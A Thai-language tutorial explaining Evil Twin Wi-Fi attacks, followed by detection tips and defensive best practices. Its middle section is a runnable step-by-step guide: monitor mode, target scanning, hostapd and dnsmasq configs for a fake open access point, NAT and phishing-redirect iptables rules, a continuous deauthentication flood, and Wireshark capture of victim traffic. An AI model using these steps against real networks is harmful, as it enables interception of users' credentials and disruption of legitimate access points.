Evil Twin Attack: สร้าง Fake WiFi Network เพื่อเจาะระบบและดักจับข้อมูล

บทนำ

ในยุคดิจิทัลที่การเชื่อมต่ออินเทอร์เน็ตกลายเป็นส่วนหนึ่งของชีวิตประจำวัน เครือข่าย Wi-Fi มีบทบาทสำคัญอย่างยิ่งในการเข้าถึงข้อมูลและการสื่อสาร อย่างไรก็ตาม ความสะดวกสบายนี้มาพร้อมกับความเสี่ยงด้านความปลอดภัยที่ผู้ใช้มักมองข้ามไป หนึ่งในการโจมตีที่อันตรายและแพร่หลายคือ "Evil Twin Attack" หรือการโจมตีแบบเครือข่าย Wi-Fi แฝดปีศาจ ซึ่งผู้โจมตีจะสร้างเครือข่าย Wi-Fi ปลอมขึ้นมาเพื่อหลอกล่อให้เหยื่อเชื่อมต่อและดักจับข้อมูลส่วนตัว รวมถึงข้อมูลการเข้าสู่ระบบต่างๆ บทความนี้จะเจาะลึกถึงหลักการทำงานของ Evil Twin Attack, เครื่องมือที่ใช้, ขั้นตอนการโจมตีในเชิงปฏิบัติ, วิธีการตรวจจับ, และแนวทางปฏิบัติที่ดีที่สุดในการป้องกันตนเองจากการตกเป็นเหยื่อของการโจมตีประเภทนี้ เพื่อเพิ่มความตระหนักรู้และเสริมสร้างความปลอดภัยทางไซเบอร์ให้กับผู้ใช้งานทุกระดับ

เนื้อหาหลัก: Evil Twin Attack: สร้าง Fake WiFi Network

Evil Twin Attack คือรูปแบบหนึ่งของการโจมตีแบบ Man-in-the-Middle (MITM) ที่ผู้โจมตีสร้างจุดเชื่อมต่อ (Access Point - AP) Wi-Fi ปลอมขึ้นมา โดยมีชื่อเครือข่าย (SSID) และคุณสมบัติอื่นๆ คล้ายหรือเหมือนกับเครือข่าย Wi-Fi ที่ถูกต้องตามกฎหมายและเป็นที่รู้จัก เช่น เครือข่าย Wi-Fi สาธารณะในร้านกาแฟ สนามบิน หรือโรงแรม หรือแม้แต่เครือข่าย Wi-Fi ภายในองค์กร เป้าหมายหลักของการโจมตีคือการหลอกล่อให้ผู้ใช้งานเชื่อมต่อกับ AP ปลอมนี้แทน AP จริง เมื่อเหยื่อเชื่อมต่อสำเร็จ ข้อมูลทั้งหมดที่ส่งผ่านเครือข่ายนั้นจะถูกดักจับและสามารถถูกตรวจสอบโดยผู้โจมตีได้

การโจมตีประเภทนี้อาศัยความเชื่อใจและความเคยชินของผู้ใช้ ผู้ใช้ส่วนใหญ่มักจะมองหาชื่อเครือข่าย Wi-Fi ที่คุ้นเคยและเชื่อมต่อโดยอัตโนมัติ โดยไม่ตรวจสอบความถูกต้องหรือความปลอดภัยของจุดเชื่อมต่อนั้นอย่างละเอียด ซึ่งเป็นช่องโหว่ที่ผู้โจมตีใช้ประโยชน์เพื่อดักจับข้อมูลละเอียดอ่อน เช่น ชื่อผู้ใช้ รหัสผ่าน ข้อมูลบัตรเครดิต หรือข้อมูลส่วนตัวอื่นๆ ที่ถูกส่งผ่านเว็บไซต์ที่ไม่ใช้การเข้ารหัส (HTTP) หรือแม้แต่เว็บไซต์ที่ใช้ HTTPS หากผู้โจมตีสามารถทำการโจมตี SSL Stripping ได้

หลักการทำงานของ Evil Twin Attack

การโจมตีแบบ Evil Twin มีขั้นตอนหลักๆ ที่ผู้โจมตีต้องดำเนินการ เพื่อให้บรรลุเป้าหมายในการหลอกล่อและดักจับข้อมูล:

1. การเลือกเป้าหมายและข้อมูลจำเพาะของเครือข่าย: ผู้โจมตีจะระบุเครือข่าย Wi-Fi เป้าหมายที่ต้องการเลียนแบบ เช่น "Starbucks_Free_Wifi" หรือ "Corporate_Guest_Network" จากนั้นจะทำการสแกนเพื่อเก็บข้อมูลสำคัญของเครือข่ายจริง เช่น ชื่อ SSID, BSSID (MAC Address ของ AP), ช่องสัญญาณ (Channel) ที่ใช้งาน, และประเภทของการเข้ารหัส (ถ้ามี)
2. การจำลอง Access Point (AP) ปลอม: ผู้โจมตีจะใช้ซอฟต์แวร์และฮาร์ดแวร์พิเศษ (เช่น การ์ด Wi-Fi ที่รองรับ Monitor Mode) เพื่อสร้าง AP ปลอมที่มีชื่อ SSID เหมือนกับเครือข่ายเป้าหมาย และอาจใช้ BSSID ปลอมที่คล้ายกับของจริง เพื่อให้ดูน่าเชื่อถือยิ่งขึ้น AP ปลอมนี้จะถูกตั้งค่าให้แจกจ่าย IP Address (DHCP Server) ให้กับอุปกรณ์ที่เชื่อมต่อ และส่งต่อการเชื่อมต่อไปยังอินเทอร์เน็ตได้ ซึ่งทำให้เหยื่อไม่รู้สึกผิดปกติ
3. การทำให้ Access Point ของจริงใช้งานไม่ได้ (Deauthentication/Jamming): ในบางกรณี ผู้โจมตีอาจใช้การโจมตีแบบ Deauthentication เพื่อตัดการเชื่อมต่ออุปกรณ์ของเหยื่อออกจาก AP จริง ทำให้เหยื่อต้องค้นหาเครือข่ายใหม่เพื่อเชื่อมต่อ และมีแนวโน้มที่จะเลือกเชื่อมต่อกับ AP ปลอมของผู้โจมตีที่มีสัญญาณแรงและชื่อที่คุ้นเคย หรืออาจใช้การรบกวนสัญญาณ (Jamming) เพื่อลดประสิทธิภาพของ AP จริง
4. การหลอกล่อให้เหยื่อเชื่อมต่อ: ด้วย AP ปลอมที่มีสัญญาณแรงและชื่อที่คุ้นเคย พร้อมกับการตัดการเชื่อมต่อจาก AP จริง เหยื่อส่วนใหญ่จะถูกหลอกให้เชื่อมต่อกับ Evil Twin โดยไม่รู้ตัว
5. การดักจับข้อมูล (Data Interception): เมื่อเหยื่อเชื่อมต่อกับ AP ปลอม ข้อมูลทั้งหมดที่เหยื่อส่งและรับผ่านเครือข่ายนั้น จะถูกส่งผ่านอุปกรณ์ของผู้โจมตี ผู้โจมตีสามารถใช้เครื่องมือวิเคราะห์แพ็กเก็ต (Packet Sniffer) เช่น Wireshark หรือเครื่องมือ MITM อื่นๆ เพื่อดักจับและวิเคราะห์ข้อมูลต่างๆ ได้ รวมถึงการใช้เทคนิค SSL Stripping เพื่อลดระดับการเข้ารหัส HTTPS เป็น HTTP เพื่อดักจับข้อมูลล็อกอินที่ปกติจะถูกเข้ารหัส

เครื่องมือที่ใช้ในการสร้าง Evil Twin

การโจมตี Evil Twin มักใช้เครื่องมือโอเพนซอร์สหลายชนิดที่ทำงานร่วมกันบนระบบปฏิบัติการที่เน้นการทดสอบเจาะระบบ เช่น Kali Linux หรือ Parrot OS เครื่องมือหลักๆ ประกอบด้วย:

• Aircrack-ng Suite: ชุดเครื่องมือสำหรับการประเมินความปลอดภัยของเครือข่าย Wi-Fi รวมถึง:

- airmon-ng: สำหรับเปิดใช้งานโหมดตรวจสอบ (Monitor Mode) บนการ์ด Wi-Fi
- airodump-ng: สำหรับสแกนหาเครือข่าย Wi-Fi รอบข้างและเก็บข้อมูล AP ต่างๆ (SSID, BSSID, Channel, Encryption)
- airbase-ng: สำหรับสร้าง Soft AP (Access Point ปลอม)
- aireplay-ng: สำหรับการโจมตีแบบ Deauthentication เพื่อตัดการเชื่อมต่อจาก AP จริง

• Hostapd: ซอฟต์แวร์สำหรับสร้าง AP (Access Point) และ RADIUS server ทำหน้าที่เป็นตัวจัดการ AP ปลอม รวมถึงการตั้งค่า SSID, BSSID และการเข้ารหัส


• Dnsmasq: ซอฟต์แวร์ที่ทำหน้าที่เป็น DHCP (Dynamic Host Configuration Protocol) server และ DNS (Domain Name System) server เพื่อแจกจ่าย IP Address ให้กับอุปกรณ์ที่เชื่อมต่อกับ AP ปลอม และสามารถใช้ในการเปลี่ยนเส้นทาง DNS (DNS Spoofing) เพื่อนำเหยื่อไปยังหน้าเว็บฟิชชิงได้


• IPTables: เครื่องมือสำหรับจัดการ Firewall Rules ใน Linux ใช้ในการตั้งค่าการส่งต่อแพ็กเก็ต (IP Forwarding) และการเปลี่ยนเส้นทางทราฟฟิก (Port Redirection) เพื่อให้ AP ปลอมสามารถส่งข้อมูลไปยังอินเทอร์เน็ตได้และดักจับข้อมูลบางอย่าง


• Driftnet: เครื่องมือดักจับรูปภาพที่ไม่ได้เข้ารหัสผ่านเครือข่าย


• Mitmproxy / Bettercap: เครื่องมือสำหรับโจมตีแบบ Man-in-the-Middle ที่ซับซ้อนขึ้น สามารถทำ SSL Stripping, ดักจับข้อมูล HTTP/HTTPS และปรับเปลี่ยนการตอบสนองของเซิร์ฟเวอร์


• Karma Attack / Mana Toolkit: เป็นการโจมตี Evil Twin ขั้นสูง โดยเฉพาะ Karma Attack จะสร้าง AP ปลอมจำนวนมากที่เลียนแบบชื่อ SSID ที่อุปกรณ์ของเหยื่อเคยเชื่อมต่อ เพื่อเพิ่มโอกาสในการหลอกล่อให้เหยื่อเชื่อมต่ออัตโนมัติ




ขั้นตอนการสร้าง Evil Twin Attack (ตัวอย่างคำสั่ง)



การดำเนินการโจมตี Evil Twin ต้องใช้การ์ด Wi-Fi ที่รองรับโหมดตรวจสอบ (Monitor Mode) โดยตัวอย่างนี้จะใช้เครื่องมือพื้นฐานของ Aircrack-ng, Hostapd และ Dnsmasq

1. การเตรียมการ: ตรวจสอบการ์ด Wi-Fi และเปิดใช้งาน Monitor Mode

ขั้นแรกคือการระบุอินเทอร์เฟซ Wi-Fi และนำมันเข้าสู่ Monitor Mode



h

iwconfig


(ผลลัพธ์อาจเป็น wlan0, wlan1 หรืออื่นๆ)

จากนั้น ปิด Process ที่รบกวน (ถ้ามี) และเข้าสู่ Monitor Mode:



h

airmon-ng check kill

airmon-ng start wlan0


(wlan0 จะเปลี่ยนเป็น wlan0mon หรือ mon0)

2. การสแกนหาเครือข่ายเป้าหมาย

ใช้ airodump-ng เพื่อสแกนหาเครือข่าย Wi-Fi รอบข้าง และระบุ SSID, BSSID, และ Channel ของเครือข่ายเป้าหมาย



h

airodump-ng wlan0mon


เมื่อเจอเป้าหมาย ให้จดค่า BSSID และ Channel เช่น BSSID: AA:BB:CC:DD:EE:FF, Channel: 6, SSID: Target_Wifi จากนั้นหยุดการสแกนด้วย Ctrl+C

3. การสร้าง Fake AP ด้วย Hostapd และ Dnsmasq

Hostapd จะสร้าง AP ปลอม และ Dnsmasq จะแจกจ่าย IP และทำหน้าที่เป็น DNS Server


• สร้างไฟล์ hostapd.conf:





h

    nano /etc/hostapd/hostapd.conf

    


ใส่ข้อมูลต่อไปนี้ (แทนที่ wlan0mon, Target_Wifi, 6 ด้วยค่าของคุณ)




    interface=wlan0mon

    driver=nl80211

    ssid=Target_Wifi

    channel=6

    hw_mode=g

    macaddr_acl=0

    auth_algs=1

    ignore_broadcast_ssid=0

    


(ไฟล์นี้สร้าง AP แบบ Open ไม่มีการเข้ารหัส ซึ่ง Evil Twin ส่วนใหญ่มักเป็นแบบนี้เพื่อหลอกล่อให้ง่ายขึ้น)


• สร้างไฟล์ dnsmasq.conf:





h

    nano /etc/dnsmasq.conf

    


ใส่ข้อมูลต่อไปนี้




    interface=wlan0mon

    dhcp-range=10.0.0.10,10.0.0.100,12h

    dhcp-option=3,10.0.0.1

    dhcp-option=6,10.0.0.1

    log-queries

    log-dhcp

    




• กำหนด IP ให้กับอินเทอร์เฟซที่สร้างขึ้น:





h

    ifconfig wlan0mon up 10.0.0.1 netmask 255.255.255.0

    




• เปิดใช้งาน IP Forwarding: เพื่อให้อุปกรณ์ของเหยื่อสามารถเข้าถึงอินเทอร์เน็ตได้ผ่านผู้โจมตี





h

    echo 1 > /proc/sys/net/ipv4/ip_forward

    




• ตั้งค่า IPTables สำหรับ NAT และ Redirection: เพื่อส่งต่อทราฟฟิกและดักจับ (ถ้าต้องการ)





h

    iptables --flush

    iptables --table nat --flush

    iptables --delete-chain

    iptables --table nat --delete-chain



    # NAT traffic from the fake AP to the internet (replace eth0 with your internet-connected interface)

    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

    iptables -A FORWARD -i wlan0mon -o eth0 -j ACCEPT

    iptables -A FORWARD -o wlan0mon -i eth0 -j ACCEPT



    # Optional: Redirect HTTP traffic to a local web server (e.g., for a phishing page)

    # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    




• เริ่ม Hostapd และ Dnsmasq:





h

    hostapd /etc/hostapd/hostapd.conf -B

    dnsmasq -C /etc/dnsmasq.conf -d

    



4. การโจมตี Deauthentication (ไม่บังคับแต่มีประสิทธิภาพ)

เปิด Terminal ใหม่ และใช้ aireplay-ng เพื่อตัดการเชื่อมต่ออุปกรณ์ของเหยื่อจาก AP จริง ทำให้เหยื่อต้องเชื่อมต่อใหม่



h

aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon


(แทนที่ AA:BB:CC:DD:EE:FF ด้วย BSSID ของ AP จริง)
(หากต้องการโจมตีเฉพาะเหยื่อรายใดรายหนึ่ง ให้เพิ่ม -c )

ตอนนี้ AP ปลอมของคุณได้ถูกสร้างขึ้นแล้ว และมี DHCP/DNS Server พร้อมส่งต่ออินเทอร์เน็ต หากเหยื่อเชื่อมต่อสำเร็จ ทราฟฟิกของพวกเขาจะวิ่งผ่านอุปกรณ์ของคุณ และคุณสามารถใช้เครื่องมืออื่นๆ เช่น Wireshark บน wlan0mon เพื่อดักจับและวิเคราะห์ข้อมูลได้



h

wireshark -i wlan0mon


(หรือถ้าได้ตั้งค่า redirection ไปยังเว็บฟิชชิง, คุณก็จะได้ข้อมูลจากเว็บฟิชชิงนั้น)



การตรวจจับ Evil Twin Attack



การตรวจจับ Evil Twin Attack อาจเป็นเรื่องที่ท้าทาย เนื่องจากผู้โจมตีพยายามทำให้เครือข่ายปลอมดูเหมือนของจริงมากที่สุด แต่ก็มีข้อสังเกตและเครื่องมือที่สามารถช่วยได้:


• ชื่อ SSID ที่แปลกปลอมหรือซ้ำกัน: หากคุณเห็นชื่อ SSID เดียวกันปรากฏขึ้นสองครั้ง โดยมีสัญญาณที่แตกต่างกันอย่างมาก หรือมีชื่อที่คล้ายกันแต่มีตัวอักษรผิดเพี้ยนไปเล็กน้อย ควรระมัดระวังเป็นพิเศษ


• สัญญาณอ่อนผิดปกติของ AP ที่เชื่อมต่อ: หากคุณเชื่อมต่อกับ Wi-Fi ที่คุ้นเคย แต่รู้สึกว่าสัญญาณอ่อนลงหรือประสิทธิภาพการทำงานลดลงอย่างผิดปกติ อาจเป็นไปได้ว่าคุณไม่ได้เชื่อมต่อกับ AP ที่ถูกต้อง


• แจ้งเตือนความปลอดภัยของเบราว์เซอร์: หากคุณพยายามเข้าถึงเว็บไซต์ HTTPS และเบราว์เซอร์ของคุณแสดงคำเตือนเกี่ยวกับใบรับรอง SSL/TLS ที่ไม่ถูกต้องหรือไม่น่าเชื่อถือ ห้ามละเลยคำเตือนนี้ อาจเป็นสัญญาณของการโจมตี SSL Stripping ที่ดำเนินการโดย Evil Twin


• ตรวจสอบ BSSID (MAC Address ของ AP): สำหรับผู้ใช้ที่มีความรู้ทางเทคนิค สามารถใช้แอปพลิเคชันหรือเครื่องมือบนคอมพิวเตอร์เพื่อตรวจสอบ MAC Address ของ AP ที่เชื่อมต่อ หาก MAC Address แตกต่างจากที่ทราบว่าเป็นของ AP จริง ควรสงสัย


• ใช้เครื่องมือตรวจจับ Wi-Fi เฉพาะ: มีแอปพลิเคชันมือถือและซอฟต์แวร์บนคอมพิวเตอร์ที่ออกแบบมาเพื่อตรวจจับ AP ที่เป็นอันตรายหรือ Evil Twin เช่น Kismet (สำหรับ Linux), Wigle Wifi (สำหรับ Android), หรือแอปพลิเคชัน "WiFi Protector" บางตัว


• การเชื่อมต่อที่ผิดปกติ: หากคุณไม่สามารถเชื่อมต่ออินเทอร์เน็ตได้ ทั้งๆ ที่เชื่อมต่อกับ Wi-Fi แล้ว หรือถูกขอให้ล็อกอินเข้าสู่ระบบอีกครั้งบ่อยครั้ง อาจเป็นสัญญาณของ AP ปลอมที่พยายามดักจับข้อมูล




Security Best Practices



การป้องกันตนเองจากการโจมตีแบบ Evil Twin ต้องอาศัยทั้งการใช้เทคโนโลยีที่เหมาะสมและการสร้างความตระหนักรู้ของผู้ใช้งาน:


• ใช้ VPN เสมอเมื่อเชื่อมต่อ Wi-Fi สาธารณะ: เครือข่ายส่วนตัวเสมือน (VPN) จะสร้างอุโมงค์การเชื่อมต่อที่เข้ารหัสระหว่างอุปกรณ์ของคุณกับเซิร์ฟเวอร์ VPN ทำให้ข้อมูลของคุณปลอดภัยจากการดักจับ แม้ว่าคุณจะเชื่อมต่อกับ Evil Twin ก็ตาม


• ตรวจสอบความถูกต้องของชื่อ SSID อย่างละเอียด: ก่อนเชื่อมต่อกับ Wi-Fi สาธารณะใดๆ ให้สอบถามเจ้าหน้าที่หรือผู้ดูแลสถานที่เพื่อยืนยันชื่อ SSID ที่ถูกต้องและรายละเอียดการเชื่อมต่ออื่นๆ


• หลีกเลี่ยงการเชื่อมต่อ Wi-Fi สาธารณะที่ไม่น่าเชื่อถือ: หากเป็นไปได้ ควรใช้ข้อมูลมือถือ (Mobile Data) แทนการเชื่อมต่อ Wi-Fi สาธารณะที่ไม่รู้จักหรือไม่ได้รับการเข้ารหัส


• ปิดคุณสมบัติ "เชื่อมต่ออัตโนมัติ" (Auto-Connect): ปิดการตั้งค่าให้อุปกรณ์เชื่อมต่อกับเครือข่าย Wi-Fi ที่เคยเชื่อมต่อโดยอัตโนมัติ การทำเช่นนี้จะทำให้คุณมีโอกาสตรวจสอบความถูกต้องของเครือข่ายก่อนการเชื่อมต่อทุกครั้ง


• ใช้ HTTPS และ SSL/TLS เสมอ: ตรวจสอบให้แน่ใจว่าเว็บไซต์ที่คุณเข้าชมใช้ HTTPS (มีไอคอนแม่กุญแจในแถบ URL) และหลีกเลี่ยงการกรอกข้อมูลละเอียดอ่อนบนเว็บไซต์ที่เป็น HTTP ธรรมดา


• อัปเดตระบบปฏิบัติการและซอฟต์แวร์: การอัปเดตระบบปฏิบัติการ เว็บเบราว์เซอร์ และแอปพลิเคชันอยู่เสมอ ช่วยให้คุณได้รับแพตช์ความปลอดภัยล่าสุดที่ช่วยป้องกันช่องโหว่ต่างๆ


• ติดตั้งและอัปเดต Antivirus/Antimalware: ซอฟต์แวร์ป้องกันไวรัสและมัลแวร์ที่อัปเดตอยู่เสมอ สามารถช่วยตรวจจับและป้องกันการติดตั้งมัลแวร์ที่อาจมาพร้อมกับการโจมตี


• ใช้ Multi-Factor Authentication (MFA): เปิดใช้งานการยืนยันตัวตนแบบหลายปัจจัยสำหรับบัญชีออนไลน์สำคัญๆ ทุกบัญชี แม้ว่ารหัสผ่านของคุณจะถูกดักจับไปได้ ผู้โจมตีก็ยังไม่สามารถเข้าถึงบัญชีของคุณได้หากไม่มีปัจจัยที่สอง


• ระมัดระวังการคลิกลิงก์และเปิดไฟล์แนบ: ผู้โจมตีอาจใช้เครือข่าย Evil Twin เพื่อส่งหน้าเว็บฟิชชิง หรือไฟล์แนบที่เป็นอันตรายผ่านการเปลี่ยนเส้นทาง DNS หรือการโจมตีอื่นๆ


• ใช้ Wi-Fi ที่เข้ารหัส: เลือกใช้เครือข่าย Wi-Fi ที่มีการเข้ารหัส WPA2 หรือ WPA3 เท่านั้น เครือข่ายแบบ Open Wi-Fi ไม่มีมาตรการป้องกันข้อมูลของคุณ

บทสรุป

Evil Twin Attack เป็นภัยคุกคามทางไซเบอร์ที่ซับซ้อนและอันตราย เนื่องจากสามารถหลอกล่อให้ผู้ใช้ที่ไม่ระมัดระวังตกเป็นเหยื่อได้อย่างง่ายดาย โดยเฉพาะอย่างยิ่งในสถานที่สาธารณะที่ผู้คนคุ้นเคยกับการใช้ Wi-Fi ฟรี การทำความเข้าใจหลักการทำงานของ Evil Twin การรู้จักเครื่องมือที่ใช้ และการเรียนรู้วิธีการตรวจจับและการป้องกันเป็นสิ่งสำคัญอย่างยิ่งสำหรับทุกคน การปฏิบัติตามแนวทางความปลอดภัยที่ดีที่สุด เช่น การใช้ VPN การตรวจสอบความถูกต้องของเครือข่าย และการมีความระมัดระวังในการเชื่อมต่อ จะช่วยลดความเสี่ยงจากการตกเป็นเหยื่อของการโจมตีประเภทนี้ได้อย่างมาก การเพิ่มความตระหนักรู้ด้านความปลอดภัยทางไซเบอร์เป็นก้าวแรกที่สำคัญในการปกป้องข้อมูลส่วนตัวและความเป็นส่วนตัวของเราในโลกดิจิทัลที่เชื่อมโยงถึงกันอย่างต่อเนื่อง